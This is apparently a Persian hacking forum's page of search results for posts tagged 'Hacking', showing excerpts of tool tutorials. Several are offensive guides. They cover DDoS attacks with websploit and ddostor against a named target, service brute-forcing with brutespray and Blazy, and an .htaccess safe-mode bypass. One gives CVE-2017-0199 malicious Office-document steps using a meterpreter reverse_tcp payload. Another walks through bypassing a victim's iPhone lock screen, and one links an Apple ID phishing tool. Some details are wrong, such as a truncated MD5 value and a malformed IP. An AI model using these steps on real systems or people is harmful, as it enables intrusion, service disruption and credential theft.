امکانات انجمن
  • مهمانان محترم می توانند بدون عضویت در سایت در بخش پرسش و پاسخ به بحث و گفتگو پرداخته و در صورت وجود مشکل یا سوال در انجمنن مربوطه موضوع خود را مطرح کنند

moharram

iran rules jazbe modir
snapphost mahak

جستجو در تالارهای گفتگو

در حال نمایش نتایج برای برچسب های 'Hacking'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


تالارهای گفتگو

  • انجمن های اصلی تیم
    • قوانین و اساسنامه ی انجمن
    • آخرین خبرها
    • اطلاعیه ها
    • مدیران
    • دوره های آموزشی
    • انتقادات پیشنهادات
  • آموزش های تخصصی
    • برنامه نویسی
    • هکینگ
    • امنیت
    • شبکه
    • سخت افزار
    • متفرقه
  • پرسش و پاسخ (FAQ)
    • سوالات و مشکلات پیرامون برنامه نویسی
    • سوالات و مشکلات پیرامون هکینگ
    • سوالات و مشکلات پیرامون امنیت
    • سوالات و مشکلات پیرامون شبکه
    • سوالات و مشکلات پیرامون سخت افزار
    • سوالات و مشکلات پیرامون سیستم عامل
    • سوالات و درخواست های متفرقه
  • سیستم عامل
    • ویندوز
    • لینوکس
    • کالی لینوکس
    • اندروید
    • اپل
  • بخش ویژه (مخصوص اعضای ویژه)
    • هکینگ
    • امنیت
    • شبکه
    • متفرقه
  • پروژه های تیم
    • پروژه های نفوذ به سایت
    • پروژه های ساخت نرم افزار
    • پروژه های آسیب پذیری
    • پروژه های ساخت سایت
  • مسابقات
    • مسابقات امنیت و هکینگ
    • مسابقات برنامه نویسی
    • مسابقات کرکینگ
  • عمومی
    • توسعه دهندگان
    • ترفند های متفرقه
    • گرافیک
    • ربات تلگرام
  • بحث آزاد علمی
    • عمران و معماری
    • الکتروتکنیک
    • کتابخانه سراسری
  • بخش دریافت
    • دانلود نرم افزار
  • آرشیو
    • بایگانی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


درباره من


جنسیت


محل سکونت

806 نتیجه پیدا شد

  1. Rednofozi

    Hacking

    توضیحات این ابزار این ابزار که tweets_analyzer نام دارد توسط فردی به نام x0rz نوشته شده است. این ابزار که به زبان پایتون نوشته شده است برای انالیز اکانت های توییتر ویژگی هایی استفاده میکند که عبارت اند از: میانگین توییت کردن کاربر در هر ساعت و هر روز منطقه زمانی و زبان استفاده کاربر از اپلیکیشن موبایل و وب بروزر موقعیت مکانی بیشترین هشتک ها بیشترین ریتوییت ها زبان و مکان دوستان کاربر نحوه نصب اول از همه API keys موجود در secrets.py را بروزرسانی کنید. برای بدست اوردن API keys از وبسایت برنامه های توییتر استفاده کنید. نکته:برای اجرای این اسکریپت پایتونی شما به پایتون نسخه ۲٫۷ یا جدیدتر نیازمند هستید. شما نیز دارید تا پکیج های پایتونی از جمله tweepy, ascii_graph, tqdm, numpy را نصب کنید. برای نصب این پکیج ها از دستور زیر استفاده کنید: pip install -r requirements.txt نحوه اجرا برای اجرای اسکریپت پایتونی انالیز اکانت های توییتر از دستور زیر استفاده کنید: tweets_analyzer.py -n username [options] دستورات برای تنظیمات(options) دستور help h- دستوری برای انجام انالیزی سریع برای دوستان کاربر بر اساس منطقه زمانی و زبان friends– دستوری برای محدود کردن تعداد توییت های مورد بررسی l- نکته:بعد از l تعداد توییت مورد نظرتان را وارد کنید. دستوری برای ذخیره کردن فایل ها بصورت JSON j- https://github.com/x0rz/tweets_analyzer
  2. Rednofozi

    Hacking

    اموزش نصب ابزار برای نصب در سیستم عامل لینوکس خود میتوانید از دستور زیر استفاده کنید اما درصورتی که این ابزار در مخازن موجود نبود میتوانید با استفاده از روش زیر جداگانه نصب کنید در ابتدا لینک را از بخش دانلود در اخر صفحه دریافت کنید و جایگزین Link در دستور زیر کنید git clone Link وارد پوشه دانلود شده شوید cd brutespray با دستور زیر پیشنیاز های ابزار را نصب کنید pip install -r requirements.txt حال برای نمایش سویچ های ابزار دستور زیر را وارد کنید python brutespray.py -h نحوه استفاده برای استفاده و بروت فورس یک سرویس با استفاده از ابزار معرفی شده به مثال زیر توجه کنید python brutespray.py –file nmap.gnmap -u admin -p password –threads 5 –hosts 5 در ابتدا با استفاده از پایتون ابزار را اجرا کردیم با سویچ –file خروجی nmap را وارد کردیم و با -u یوزرنیم خود را وارد میکنیم و با استفاده از -p یک پسورد انتخاب میکنیم با استفاده از –threads سرعت انجام تست نفوذ را بسته به سرعت خود انتخاب کنید و در سویچ –hosts تعداد سرویس را انتخاب کنید پشتیبانی ابزار از سرویس های : ssh ( سرویس اتصال بین سرور ) ftp ( سرویس انتقال فایل ) telnet (سرویس اتصال بین سرور ویندوز) vnc (اتصال گرافیکی) mssql (دیتابیس) mysql (دیتابیس) smtp (ایمیل) بروت فورس و امنیت چندین راه برای جلوگیری از حملات بروت فورس وجود دارد که میتواند در سرویس های مختلف متفاوت باشد ما به چند نمونه از راه های امنیت در مقابل حملات بروت فورس میپردازیم استفاده از کپچا در صفحات ورد وبسایت ها محدود کردن ای پی در سرویس بلاک کردن ای پی هنگام وارد کردن چندین باره پسورد ابزار های تشخیص ربات استفاده از پسورد های طولانی با کارکتر های مختلف https://github.com/x90skysn3k/brutespray
  3. کنفرانس پریسا تبریزی در بلک هت 2018 کامل با زیرنویس فارسی https://tg-go.noyes.in/i/BQADBAAD1AgAAkJ_SFIFfU5ixQ-rCwI/b179e196dfecf083d3428947d3c8f91d/1539935578 موفق باشید
  4. یکی از ابزارهای معروف هکینگ و اتکینگ بی شک ابزار websploit هست که با قابلیت های (wifijammer,wifi attacking, webkiller و ...) خلاصه ما در این اموزش از webkiller استفده میکنیم ابتدا ترمینال را باز کنید و با دستور زیر اقدام به نصب websploit بکنید : sudo apt-get install websploit با دستور بالا اقدام نصب این ابزار میشود بعد از نصب ابزار با دستور websploit ابزار را اجرا کنید و دستور زیر را بنویسید : use network/webkiller و بعد با دستور : set target target.com شما به جای target.com سایت مورد هدف را قرار بدید و بعد با دستور run اقدام به اجرای اتک کنید این به نظرم بسیاری از ابزار ها قدرت مند تر هست . با امید موفقیت امید وارم خوشتان امده باشد .
  5. Black_petya

    Hacking-Ddos

    یکی از بهترین دیداسر های در زمینه اتک دیداسر tor هست که بدون شناسایی ایپی شما عملیات را انجام میدهد و قدرت زیادی نسبت به دیداسر های دیگری دارد . ابتدا با دستور زیر اقدام به دانلود ddostor کنید . git clone https://github.com/thelinuxchoice/ddostor.git بعد از دانلود شدن با دستور cd به دایرکتوری ddostor بروید . با دستور زیر اجرا کنید : bash ddostor.sh بعد از اجرا از شما target میخواهد ادرس تارگنت خود را بدید بعد از شما پورت میخواهید معمولا پورت 80 بعد از شما تعداد پکد هارا میخواد 6000 وارد کنید بعد دیداسر اقدام به انجام عملیات دیداس میکند امید وارم خوشتان امده باشد .
  6. Moeein Seven

    Hacking

    دوره آموزشی Password attacks از فرانش قیمت 20000 کاری از بهروز منصوری Password attacks.rar - Telegram File Download Service Password attacks.rar - Telegram File Download Service
  7. Rednofozi

    Hacking

    # increase performance by disabling allowoverride AllowOverride All None DirectoryIndex index.html index.htm index.php index.php4 index.php5 Options All +Indexes +FollowSymLinks Options All +ExecCGI Options All +Indexes Options All +FollowSymLinks Options All +SymLinksIfOwnerMatch Options All +MultiViews Options All +Includes Options All +IncludesNOEXEC AddType ****/plain .php AddType application/octet-stream .php AddHandler server-parsed .php Addhandler cgi-script .asp AddType txt .php AddHandler txt .php Bypass safemode .htaccess
  8. نکته قبل از نصب حتما پایتون نسخه ۳ استفاده نمایید تا به درستی اجرا شود امکانات Admin Finder استفاده از پروکسی تست پارامتر های تصادفی برای جسجو جستجو بیش از ۵۰۰ صفحه امکان بالا بودن سرعت Multithreading امکان افزودن صفحه به ابزار … نصب در لینوکس ابتدا لینک را از اخر صفحه دریافت کنید سپس جایگزین Link در دستور زیر کنید و دستور را اجرا کنید git clone Link بعد از اتمام دانلود وارد پوشه دانلود شده شوید cd okadminfinder3 برای نصب پیشنیاز ها از دستور زیر استفاده نمایید pip3 install -user -r requirements.txt حال سطح دسترسی فایل را بالا ببرید chmod 775 okadminfinder.py حال برای اجرا میتوانید از پایتون ۳ مانند دستور زیر استفاده کنید python3 okadminfinder.py پیکربندی کالی لینوکس برای اتصالات شبکه نحوه استفاده ابتدا برای نبایش سویچ های راهنما از دستور زیر استفاده کنید python3 okadminfinder.py -h برای جستجوی صفحه ادمین از سویچ -u استفاده کنید به طور مثال : python3 okadminfinder.py -u site.com درصورتی که از پروکسی استفاده میکنید میتوانید مانند دستور زیر پروکسی را فعال کنید python3 okadminfinder.py -u target.com –proxy 127.0.0.1:53281 GitHub - mIcHyAmRaNe/okadminfinder3: [ Admin panel finder / Admin Login Page Finder ] ¢σ∂є∂ ву 👻 (❤-❤) 👻
  9. Rednofozi

    Hacking

    نصب ابزار در لینوکس در ابتدا لینک دانلود ابزار را از بخش دانود بعد از ثبت نام دریافت کنید سپس در دستور زیر لینک را با کلمه Link جایزین کنید و دستور را وارد کنید git clone Link سپس وارد پوشه دانلود شده شوید و ابزار ساخت پسورد لیست ایرانی و اختصاصی را اجرا کنید cd bopscrk ; python bopscrk.py مرحله به مرحله سوالاتی پرسیده میشود که برای ساخت پسورد لیت حرفه ای به شما کمک خواهد کرد اما میتوانید بدون سوال ها فایل خود را از طریق سویچ ها بسازید مانند دستور زیر : python bopscrk.py -min 4 -max 15 -w rednofozi-l -c -n2 برای اشنایی با سویچ های ابزار و عمل کرد ان ها میتوانید از دستور زیر استفاده کنید python bopscrk.py -h بعد از ساخت پسورد فایل در همان پوشه اباز با فورمت txt ذهیره خواهد شد GitHub - R3nt0n/bopscrk: A tool to generate smart and powerful wordlists.
  10. Rednofozi

    Hacking

    هشکت میتواند از پردازنده ها با هم استفاده کند و حتی قدرت انتخاب به کاربر میدهد که از کدام پردازنده استفاده شود و از کدام پردازنده ها استفاده نشود! مثلاً اگر سیستمی داشته باشیم که دو عدد کارت گرافیک و یک CPU داشته باشد ، هشکت میتواند از تمامی این موارد بدون هیچ مشکلی استفاده کند! (در سیستم‌هایی که چندین کارت گرافیک دارند حتی نیازی هم به رابط SLI و یا Crossfire ندارد!) hashcat از کارت گرافیک های برند Nvidia , AMD و حتی کارت گرافیکِ داخلیِ برخی CPU های اینتل را هم پشتیبانی میکند. ضمنا یک سیستم کنترل حرارت نیز دارد تا پردازنده ها بیش از حد داغ نشوند. یکی از قابلیت های خوب این ابزار این هستش که اگه یه وقت در حین کرک کردن برق رفت یا مشکلی برای سیستم پیش آمد که هشکت از کار بیوفتد ، قابلیت Restore به کمک شما می آید! با استفاده از این قابلیت ، تنها با یک دستور میتوانید عملیات کرک را از همانجا که متوقف شد ، دوباره بازیابی کنید و به کرک ادامه دهید! شما با استفاده از hashcat میتوانید با روش‌های زیر هش هارا کرک کنید: Brute Force (Mask Attack) Password List Attack Hybrid Attack Rule-Based Attack Combination Attack و غیره… شاید تابه حال نام برخی از این روش‌ها را نشنیده باشید ، اما در قسمت های بعدی این آموزش ، همه ی این‌ها شرح داده خواهد شد. هشکت بیش از ۱۶۰ نوع هش های مختلف و معروف را پشتیبانی می کند ، حتی می‌تواند هندشیک های شبکه های وای فای (WPA/WPA2) را نیز کرک کند و پسورد آن ها را بیابد. هشکت میتواند هش های Salt شده را هم بدون هیچ مشکلی کرک کند! (این ویژگی بسیار بسیار مهم است!) نکات مهم کارت های گرافیک بسیار بسیار سریعتر از CPU ها هستند ، زیرا از پردازش موازی استفاده می کنند ، به همین دلیل هشکت از کارت های گرافیک هم برای کرک هش ها بهره می گیرد. این ابزار رابط گرافیکی ندارد ! و فقط توسط Terminal و یا CMD قابل اجرا است. حتما دیده ااید که برخی سایت ها به صورت آنلاین میتوانند برخی هش هارا به سرعت کرک کنند ، اما محدود هستند و فقط انواع کمی از هش هارا می توانند کرک کنند ، پس تنها راه چاره استفاده از هشکت است! سایت رسمی و سورس کد Hashcat: برای دیدن سورس کد هشکت به صفحه گیت هاب این ابزار بروید: سورس کد Hashcat در Github GitHub - hashcat/hashcat: World's fastest and most advanced password recovery utility برای دانلود هشکت به سایت رسمی آن رفته و سپس در ردیف hashcat binaries روی گزینه Download کلیک کنید. https://hashcat.net/hashcat/ قبل از کار با hashcat بدانیم که هش(Hash) چیست و چه کاربردی دارد؟ یکی از کاربردهای مهم هش ها ، مٌبهَم سازی یا رمزنگاری کردن پسوردها یا متن ها(رشته ها) است. (که در این آموزش ما با همین کاربردش سروکار داریم). هش ها درواقع کدهایی هستند که توسط الگوریتم های خاص و بسیار پیچیده ریاضی به وجود می آیند. آن‌ها انواع مختلفی دارند ، مثلاً MD4 , MD5 , SHA1 , phpass , NTLM و… یکی از معروف ترین الگوریتم هش ، MD5 است. به عنوان مثال ، اگر توسط یک نرم‌افزار که هش تولید میکند ، رشته ی test123 را به هش با الگوریتم MD5تبدیل کنیم ، کد زیر تولید میشود: cc03e747a6afbbcbf8be7668acfebee5 ولی اگر رشته ی test1234 را با MD5 هش کنیم به این شکل در می آید: ۱۶d7a4fca7442dda3ad93c9a726597e4 همانطور که میبینید ، این دو هش زیاد شبیه به هم نیستند و خیلی تفاوت دارند(البته در بعضی موارد کمی شباهت هم دارند مثل طول آن ها که در ادامه گفته میشود)، حال به رشته‌ها دقت کنید (test123 و test1234) ، تنها فرقشون این هست که در رشته ی دوم یک ۴ اضافه شده! پس کوچک‌ترین تغییر در رشته(string) ، هشِ آن را کاملاً تغییر میدهد! همه ی هش های MD5 همیشه ۳۲ کارکتر دارند که هر کارکتر میتواند ۱ تا ۹ یا A تا F باشند.(درواقع به صورت Hexadecimal). این مورد ممکن است درباره ی بقیه الگوریتم ها متفاوت باشد (مثل SHA1 و phpass). و ممکن است برخی الگوریتم ها بسیار مشابه باشند! (مثل MD5 و MD4 و حتی هش های‌ NTLM). نکته مهم: هش ها منحصر به فرد یا unique هستند. یعنی هر رشته هش منحصر به فرد خودش را دارد. اگر مثلا ۱۲۳۴۵ رو هروقت با الگوریتمMD5 هش کنیم همیشه کد زیر تولید میشود! ۸۲۷ccb0eea8a706c4c34a16891f84e7 نکته ی بالا نه تنها درمورد هش هایی که در بالا نشان داده شد صحیح است ، بلکه درمورد تمامی هش ها با هر نوع و الگوریتمی صحیح میباشد! نکته: معمولاً هیچ‌وقت دوتا رشته ی خاص و متفاوت به یک هش ثابت تبدیل نمیشوند، اما چون برخی الگوریتم ها مثل همین md5 کمی محدود هستند ، ممکن است قانونی که در بالا گفته شد شکسته شود! (البته این احتمال بسیار بسیار پایین هستش) اگر در این مورد کنجکاو هستید ، میتونید Collision attack را در اینترنت جست‌و‌جو کنید. نکته ی بسیار مهم: یک هش را هیچوقت نمیتوان مستقیماً رمزگشایی کرد و به رشته یا پسورد برگرداند! (مگر اینکه آن را کرک کنیم.) خب شاید سؤال برایتان پیش بیاد که هش کردن(یا بهتر بگیم،مبهم کردن!) پسوردها و متن ها به چه درد می خورد؟ و چرا این کار رو می کنند؟ این سؤال رو با یک مثال جواب میدم: فرض کنید یک برنامه داریم که میتونیم روی آن پسورد بزاریم و در مواقع لازم قفلش کنیم و بعداً با پسوردمون بازش کنیم. خوب ، وقتی که ما پسورد را تنظیم میکنیم ، این پسورد به صورت هش نشده(خام) در دیتابیس و یا فایل های دیگرِ برنامه ذخیره میشود… اما اگر کسی این پسورد را از دیتابیس دربیارد ، امنیت به خطر می افتد! چون این پسورد خام است و به راحتی میتوان از آن استفاده کرد! پس برنامه باید از هش استفاده کنه تا موقع تنظیم کردن پسورد ، آن پسورد تبدیل به هش شه و سپس در دیتابیس ذخیره بشه! در این صورت اگر کسی دیتابیس رو باز کند نمیتواند به سادگی به پسورد دسترسی پیدا کند چون هش شده! خب حالا وقتی که نرم افزار از کاربر برای باز شدن قفل ، تقاضای پسورد میکند ، پس از وارد کردن پسورد در برنامه ، بلافاصله پسورد وارد شده در حافظه تبدیل به هش میشه ، سپس با هشی که قبلا در دیتابیس ذخیره شده مقایسه میشه! اگه این دو هش با هم برابر باشند ، یعنی پسوورد صحیحه پس قفل باز میشه،ولی اگر پسوورد اشتباه باشه برابر نمیشن، پس برنامه به کاربر میگه که پسوورد وارد شده غلطه! یکی از کاربرد های دیگر هش ها اینه که حتی می توانند مانند اثر انگشتی برای فایل‌ها به کار آیند. هر فایل یک شناسه هش دارد. کوچکترین تغییر در فایل موجب عوض شدن هش آن فایل میشود. این برای تشخیص اینکه آیا فایل‌های دریافتی جعلی هستند یا نه بسیار کاربرد دارد. همچنین یکی از روش های آنتی ویروس ها برای پیدا کردن ویروس، استفاده از هشِ فایل ها است ، طوری که اگر هش یک فایل در لیست سیاه آنتی ویروس ها باشد ، آن فایل به عنوان یک ویروس شناسایی میشود.
  11. Rednofozi

    Hacking

    blockchain و هدف ایجاد یه دفتر کل توزیع شده غیر متمرکز بود تا اجازه دست بردن در اطلاعات آن وجود نداشته باشد. blockchain زنجیره ای از بلاک ها است که اطلاعاتی را در بر میگیرند. اولین و معروف‌ترین استفاده از فناوری زنجیره بلوکی در دفتر کل تراکنش‌های ارز دیجیتال بیتکوین اتفاق افتاده‌ است که الهام بخش ایجاد دیگر ارز های دیجیتال و پایگاه‌های داده توزیع شده مستحکم شده‌است.هر بلاک شامل ۳ عنصر است DATA HASH HASH PREVIOUS BLOCK که در ادامه به تعریف آنها می پردازیم. DATA: داده ها با توجه به ماهیت استفاده از بلاک چین متفاوت است. HASH: هش یک عملیات ریاضی می باشد که بر روی متن انجام می شود تا یک متن رمزنگاری شده حاصل شود. از معروف ترین الگوریتم های هشینگ هم میتوان MD5 و SHA رو نام برد. هش هر بلاک منحصر به فرد است مانند اثر انگشت. هش هویت بلاک و کل محتویاتش رو تعیین میکند.هر گونه تغییری در بلاک،هش بلاک را عوض می کند HASH PREVIOUS BLOCK: هش بلاک قبلی نگهداری میشود تا از هرگونه تغییر و نفوذ جلوگیری شود. همین عمل باعث بالا رفتن امنیت بلاک چین می شود همانطور که متوجه شدید هر بلاک در زنجیره بلاک ها دارای هش بلاک قبلی است. هرگونه تغییر هر چند جزیی در یک بلاک باعث می شود که هش عوض شود و با هش دخیره شده در بلاک بعدی مطابقت نداشته باشد. درست همین موضوع باعث امنیت بالای این فناوری شده است به گونه ای که نفوذ و تغییر داه ها در این فناوری عملا غیر ممکن است. موفق باشید…
  12. Rednofozi

    Hacking

    در این قسمت از آموزش قصد داریم به آموزش تشخیص قالب وردپرس بپردازیم وردپرس یکی از بهترین و معروف ترین سیستم های مدیریت محتوا در جهان است و بر اساس آمار ارایه شده، از هر ۱۰۰ سایت در ایالت متحده، ۲۲ سایت از سیستم مدیریت محتوا وردپرس استفاده میکند. میزان جست و جو نام وردپرس در موتور های جست و جو ۵ برابر بیشتر از رقیب خود یعنی جوملا و ۹ بار بیشتر از دیگر رقیب خود یعنی دروپال است. وردپرس براحتی جوملا و دروپال را کنار گذاشته است یکی از ویزگی های جذاب وردپرس، قالب های متعدد و جذاب اسا که کاربران را برای استفاده از این CMS ترغیب می کند. شما در وردپرس ی توانید از قالب های آماده استفاده کنید یا بصورت دستی خودتان دست به کار شوید و قالب دلخواه خود را بسازید اما چگونه قالب یک سایت وردپرسی را تشخیص دهیم این کار به ۴ روش امکان پذیر است جست و جو در سورس صفحه وبسایت استفاده از سایت های آنلاین تشخیص دهنده قالب وردپرس استفاده از افزونه های تشخیص قالب وردپرس استفاده از ابزاری کالی لینوکس ما در آموزش پیش رو به بررسی ۳ حالت اولیه می پردازیم و حالت آخر را تنها معرفی میکنم. در بخش سایت های آنلاین می توان سایت های زیر را معرفی کرد What Theme Wp Theme Detector پیدا کردن صفحه ادمین با ابزار Directory Finder و در بخش افزونه هم افزونه Scan WP را معرفی و بررسی میکنم. تمامی ابزار های یاد شده داری قدرت و سرعت بسیار بالایی در تشخیص قالب وردپرس هستند هرچند که با صرف اندکی زمان و جست و جو در گوگل می توانید وبسایت های بسیار زیادی را در زمینه تشخیص قالب وردپرس پیدا کنید. آموزش تشخیص قالب وردپرس امیدوارم از این آموزش لذت برده باشید شاد و پیروز باشید …
  13. Rednofozi

    Hacking

    در این آموزش قصد داریم به این سوال جواب بدهیم که چگونه هکر شویم ؟ دنیای هک بسیار گسترده تر از امنیت است.برای اینکه شما هکر شوید ابتدا باید یک شناخت کامل از اون چیزی که می خواهید هک کنید داشته باشید، سپس به آن نفوذ کنید. اگر بخواهم این قضیه را با مثال به شما بگویم ، نزدیک ترین مثالی که می توانم بزنم و الان در ذهنم است این است که فرض کنید شما می خواهید یک دیوایس را بهبود بدهید و عملکرد آن را ارتقا بدهید. مسلما برای اینکار شما نیازدارید که ابتدا اون دیوایس را بصورت کامل بشناسید، نواقص آن را بشناسید و برطرف کنید سپس آن را بهبود دهید. منظور از مثال بالا این است که شما باید در مباجث کامپیوتری کاملا تسلط داشته باشید. چگونه هکر شویم ؟ اما برای اینکه به این سوال جواب بدهیم که چگونه هکر شویم ، من توصیه میکنم که ابتدا شما برای خود مشخص کنید که در چه زمینه ای از هک می خواهید فعالیت کنید. هک دسته های متفاوتی دارد : کلاینت هکینگ سرور هکینگ وب هکینگ اما اینا کاملا کلی هستند.اگر بخواهیم مسایل را باز کنیم با دسته های بسیار متفاوت تری روبرو می شویم به عنوان مثال هک و تست نفوذ بر روی شبکه هک و تست نفوذ بر روی وبسایت ها هک و تست نفوذ بر روی دیوایس های اندرویدی هک و تست نفوذ بر روی دیوایس های ویندوزی هک و تست نفوذ بر روی دیوایس های IOS و …. اموزش تصویری DNS Spoofing به کمک Settoolkit و ettercap حتی دسته های متنوع دیگری هم وجود دارد که آنها را هم بعضی ها جز هک می دانند.مانند کرک نرم افزار ها و دور زدن لایسنس نرم افزار ها که برای اینکار نیاز به دانش زبان سخت اسمبلی دارید. همانطور که مشاهده کردید هک دنیای بسیار گسترده ای دارد. یک نکته مهم: عملیات تست نفوذ و هک را می توان با کمک سیستم عامل های کالی لینوکس و ویندوز انجام داد چگونه هکر شویم اگر نظر من را می خواهید من به شما میگویم که شما برای اینکه یک هکر قدرتمند شوید باید به تمامی مباحث و استفاده از کالی لینوکس و ویندوز تسلط داشته باشید یا حداقل در چند مورد تسلط کامل و در چند مورد آشنایی داشته باشید تا در زمینه هک موفق باشید. چون اصلا جالب نیست که بگویید من هکر هستم اما فقط توانایی هک و تست نفوذ را بر روی شبکه آن هم تنها با سیستم عامل لینوکس داشته باشید. شما برای اینکه هکر قدرتمندی شوید حتما نیاز دارید برای تحلیل کد ها با زبان های برنامه نویسی آشنا باشید و چه بهتر اگر تلسط کامل بر روی یکی از زبان های برنامه نویسی داشته باشید.برای اینکه با زبان های برنامه نویسی مخصوص هک و امنیت آشنا شوید می توانید به آموزش زیر رجوع کنید بهترین زبان برنامه نویسی برای شروع هک و امنیت چیست ؟ اصول اولیه شبکه را بطور کامل مسلط باشید و چه بسا بهتر اگردوره های CCNA و CCNP را رفته باشید. همان طور که مشاهده کردید هکر نیازمند برخوداری از توانایی های متعددی است اسکنر جوملا با ابزار joomlavs هکرها افرادی قدرتمند و دارای دانشی بسیار بالا هستند چگونه هکر شویم اما افتخار این را دارم تا به کاربران گرامی اعلام کنم که شما تنها یک قدم تا هکر شدن فاصله دارید چون تیم امنیتی anonysecپس از ماه ها تلاش پکیج آموزش جامع کالی لینوکس به ربان شیرین پارسی را خدمت شما کاربران گرامی ارایه کرده است. در دوره پیش رو هدف ما هک – امنیت و تست نفوذ است و مباحث را از پایه تا پیشرفته دنبال میکنیم. در پکیج پیش رو ابعاد مختلفی از هک را مد نظر قرار داده ایم مانند: هک ، امنیت وتست نفوذ بر روی وبسایت هک ، امنیت وتست نفوذ بر روی سیستم عامل اندروید هک ، امنیت وتست نفوذ بر روی سیستم عامل ویندوز هک ، امنیت وتست نفوذ بر روی شبکه ها داخلی رمزنگاری و … و کلی مباحث دیگر که می تواند شما را برای ورود به دنیای هک و امنیت آماده کند و شما را تا سطح حرفه ای همراهی کنید. دوره جامع اموزش کالی لینوکس به زبان شیربن پارسی امیدوارم از مطلب چگونه هکر شویم لذت برده باشید پیروز و پایدار باشید
  14. توضیحات ابزار هک با افیس بسیاری از هکر ها برای نفوذ خود در یک سیستم از روش های مختلفی استفاده میکنن که یکی از این روش ها ارسال فایل از مجموعه افیس است یعنی به طور مثال با ارسال فایل .docx که یک فایل ورد است اقدام به هک میکند با اجرای فایل ورد هم ویروس اجرا خواهد شد و هم فایل اصلی ما در این اموزش قصد داریم با استفاده از این اسیب پذیری مجموعه افیس ترکیب فایل مخرب با فایل ورد را اموزش دهیم ابزاری که معرفی خواهیم کرد با استفاده از اسیب پذیری ثبت شده CVE-2017-0199 کار میکند و قادر است به سادگی بدون پیچیدگی زیاد فایل را ترکیب کند امکان کارکرد این اکسپلویت تا مجموعه افیس چه سالی عمل میکند ؟ 2007 ۲۰۱۰ ۲۰۱۳ ۲۰۱۶ امکانات ابزار تست نفوذ با مجموعه افیس امکان استفاده از پسوند .ppsx مکان استفاده از پسوند .doc امکان ترکیب با فایل .exe امکان ترکیب با .hta انتخاب پورت اتصال اجرای ابزار در هر سیستم عامل استفاده در متاسپلویت اموزش نصب و اجرا در ابتدا برای نصب این ابزار لینک دانلود ابزار را از بخش دانلود در اخر اموزش دریافت کنید با دستور زیر وارد پوشه دانلود شده شوید cd CVE-2017-0199 حال در صورتی که پایتون ۲٫۷ رانصب شده دارید با دستور زیر ابزار را اجرا کنید python cve-2017-0199_toolkit.py برای مشاهده سویچ های راهنما از سویچ -h استفاده کنید python cve-2017-0199_toolkit.py -h اموزش ساخت پبلود و استفاده از ابزار برای ترکیب پیلود با مجموعه افیس برای ساخت پبلود با دستور زیر متاسپلویت را اجرا کنید msfconsole و به مسیر اکسپلویت بروید use multi/handler پیلود مورد نظر را انتخاب کنید set PAYLOAD windows/meterpreter/reverse_tcp ای پی سیستم را وارد کنید set LHOST 1127.0.0.1 و با دستور run پیلود ایجاد خواهد شد حال با دستور زیر اکسپلویت را اجرا و بر روی پیلود اعمال کنید دقت داشته باشید در قسمتی که ادرس فایل و ای پی داده شده است ادرس درست سیستم خود را وارد کنید python cve-2017-0199_toolkit.py -M exp -t RTF -e http://127.0.0.1/payload.exe -l /tmp/payload.exe
  15. در این تاپیک با معرفی یکی دیگر از ابزار های GitHub.com در خدمت شما هستیم… این ابزار در رده ی ابزار های مهندسی اجتماعی قرارگرفته و کاربرد اون فیشینگ کردن رمز Apple ID میباشد… لینک ابزار در گیت هاب : GitHub - KrauseFx/steal.password: Easily get the user's Apple ID password, just by asking
  16. تنظیم یه پسوورد بر روی گوشی های آیفون اولین اقدامی است که باعث جلوگیری از دسترسی مردم به اطلاعات شخصی شما میشود. هرچند که بسیار ساده خواهد بود برای هرکسی که رمز عبور شما رو دور بزنه فرقی هم نداره که Touch ID ست کرده باشید یا نه ، به راحتی به عکس ها و پیام های شما دسترسی خواهد یافت. یک آسیب پذیری رده خطرناک در ios ورژن ۸ تا ios ورژن ۱۰٫۳ وجود دارد که به هرکسی اجازه میدهد رمز آیفون شمارا بایپس کرده و از طریق دستیار صوتی اپل (Siri) به اطلاعات خصوصی شما دست پیدا کند. البته قابل ذکر است که این آسیب پذیری در نسخه بعدی ios ورژن بتا پچ شد. تمامی اطلاعاتی که نفوذگر برای نفوذ به گوشی شما نیاز دارد تنها دونستن شماره تلفن شماست !!! بله تنها با دونستن شماره تلفن شما قادر است شمارا در چندین دقیقه هک کند. اما اگر نفوذگر شماره تلفن شمارا نداشته باشد چه خواهد شد ؟ نگران نباشید بازهم میتوند شما را از طریق فراخوانی دستیار صوتی (Siri) و با پرسیدن جمله : Who Am I? هک نماید به اینصورت که دستیار صوتی شما در پاسخ شماره تلفن شمارو بازگو خواهد کرد 🙂 در اینجا به نحوه بایپس لاک اسکرین آیفون بصورت عملی میپردازیم : ۱-زمانی که شماره تلفن قربانی را بدست آوردید ، با گوشی قربانی تماس بگیرید. انی درحال زنگ خوردن است ، کافیه روی اون کلیک کنید و بعد گزینه Custom Message رو بزنید تا به صفحه تایپ مسیج جدید بروید. ۳-بعد ازین شما نیازمند فعالسازی Siri از طریق نگهداشتن دکمه Home هستید و این جمله را به Siri بگویید : Turn On Voice Over ۴-به صفحه نوشتن مسیج برگردید و روی قسمتی که باید شماره تلفن وارد کنید دوبار کلیک کرده و نگهدارید در حالی فورا روی کیبورد کلیک میکنید.اینکارو انجام دهید تا یک فیلد بالای کیبورد ظاهر شود. ۵-حالا از Siri بخواهید Turn Off Voice Over و به صفحه مسیج برگردید پیام را بنویسید و در بالای صفحه نام گیرنده را بزنید و گزینه اضافه کردن مخاطب جدید را انتخاب کنید. ۶-شما میتوانید گزینه اضافه کردن عکس را بزنید و بووووم !!! تبریک میگم اکنون شما داخل هستید و بدون رمز عبور به عکس ها دسترسی دارید همچنین شما قادرید هر مخاطبی رو انتخاب کنید و مکالمه های اون رو نگاه کنید 🙂
  17. Rednofozi

    Hacking

    ابزار Blazy ابزار همه کاره برای حملات بر روی صفحات لاگین ادمین و بایپس ان ها امکانات استفاده اسان اسکن سایت در برابر حملات csrf و Clickjacking بایپس کلود و waf عملکرد بالا بایپس لاگین با SQL injection سرعت بالا نصب ترمینال را باز کنید و دستور زیر را بزنید تا ابزار دانلود شود git clone https://github.com/UltimateHackers/Blazy حالا دستور زیر را وارد کنید تا وارد پوشه شود cd Blazy قبل از اجرا ماژول زیر را نصب کنید pip install -r requirements.txt اجرا ابزار blazy python blazy.py GitHub - s0md3v/Blazy: Blazy is a modern login bruteforcer which also tests for CSRF, Clickjacking, Cloudflare and WAF .
  18. Rednofozi

    Hacking

